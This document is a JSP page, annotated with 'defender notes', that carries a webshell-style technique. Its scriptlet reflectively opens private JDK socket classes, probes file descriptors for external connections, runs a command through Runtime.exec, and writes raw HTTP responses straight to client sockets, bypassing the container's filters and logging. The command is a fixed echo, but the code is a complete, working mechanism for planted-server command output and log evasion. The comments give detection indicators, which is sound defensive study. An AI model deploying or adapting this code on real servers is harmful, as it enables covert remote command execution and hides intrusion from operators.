<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
// Purpose (as far as this page shows): a JSP scriptlet that uses reflection on
// JDK-internal classes to locate the open socket file descriptors of the
// servlet container that are connected to non-loopback peers, then writes a
// hand-built raw HTTP response containing the output of a fixed command
// directly onto each of them, bypassing the normal servlet response object.
//
// Defender notes:
//  - The command is hard-coded (`echo "It works!!"`, below); nothing on this
//    page reads request parameters. The risk is the technique itself, not
//    this particular command.
//  - Detection indicators visible here: a JSP calling setAccessible(true) on
//    java.io.FileDescriptor#fd, sun.nio.ch.Net#remoteAddress,
//    java.net.SocketOutputStream and java.net.PlainSocketImpl; a JSP invoking
//    Runtime.exec; a JSP emitting a literal "HTTP/1.1 200 OK" status line.
//    File-integrity monitoring of deployment directories catches the artefact.
//  - Mitigation: the reflective accesses below target private members of
//    java.base; on newer JDKs strong encapsulation is expected to reject these
//    setAccessible calls by default, and the "Deprecated" file name suggests
//    this variant targets older runtimes — TODO confirm per JDK version.
//    Preventing untrusted JSP deployment (upload/write access to the webroot)
//    removes the vector entirely.

// Preparation & initialization: open up the private JDK members used below.
// FileDescriptor.fd is the private int holding the OS-level descriptor.
java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
field.setAccessible(true);
// sun.nio.ch.Net.remoteAddress(FileDescriptor): peer address of a socket fd.
Class clazz1 = Class.forName("sun.nio.ch.Net");
java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
method1.setAccessible(true);
// Loaded via the bootstrap loader (null) without running static initializers;
// the first declared constructor is taken as-is.
Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
constructor2.setAccessible(true);
// PlainSocketImpl(FileDescriptor): wraps an existing descriptor as a SocketImpl.
Class clazz3 = Class.forName("java.net.PlainSocketImpl");
java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
constructor3.setAccessible(true);
// SocketOutputStream.write(byte[]) — used to push bytes straight to the socket.
java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
write.setAccessible(true);
java.net.InetSocketAddress remoteAddress = null;
java.util.List<Integer> list1 = new java.util.ArrayList<Integer>();
java.util.List<Integer> list2 = new java.util.ArrayList<Integer>();
java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
// First pass: probe descriptor numbers 0..9999. Descriptors that are not
// sockets (or are otherwise unqueryable) throw and are skipped; sockets whose
// peer string starts with "/127.0.0.1" (loopback) are skipped; the rest are
// recorded.
for(int i = 0; i < 10000; i++){
field.set(fileDescriptor, i);
try{
remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
list1.add(i);
}catch(Exception e){
// pass — deliberately ignored: a failing probe just means "not a usable socket"
}
}
// Delay 2s between the two passes.
Thread.sleep(2000);
// Second pass: identical probe, recorded separately.
for(int i = 0; i < 10000; i++){
field.set(fileDescriptor, i);
try{
remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
list2.add(i);
}catch(Exception e){
// pass — deliberately ignored, same reason as above
}
}
// Intersection: keep only descriptors that were connected to a non-loopback
// peer in both passes (i.e. stayed open across the 2s gap).
list1.retainAll(list2);
for(Integer fdVal : list1){
try{
field.set(fileDescriptor, fdVal);
// Wrap the raw descriptor as PlainSocketImpl, then as SocketOutputStream.
Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
// Run the fixed command and slurp its stdout in one token ("\\A" = start of input).
String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
// Hand-built HTTP/1.1 response; written below directly to the socket, so it
// never passes through the container's response pipeline (filters, logging).
String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
write.invoke(socketOutputStream, new Object[]{result.getBytes()});
}catch (Exception e){
// pass — deliberately ignored: a descriptor that cannot be written is skipped
}
}
%>